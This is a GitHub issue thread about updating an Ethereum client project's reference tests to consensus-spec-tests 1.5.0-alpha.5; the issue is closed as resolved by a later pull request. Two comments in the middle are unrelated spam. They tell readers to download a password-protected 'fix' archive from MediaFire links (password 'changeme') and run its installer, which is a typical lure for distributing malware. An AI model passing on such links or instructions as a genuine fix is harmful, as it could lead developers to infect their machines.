### ISSUE TITLE
Update reference tests to 1.5.0-alpha.5

### ISSUE THREAD

**Issue by zilm13** [Nashatyrev/artemis#114]
https://github.com/ethereum/consensus-spec-tests/releases/tag/v1.5.0-alpha.5
..and check it's passed of course

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by zilm13** [comment]
resolved by #125
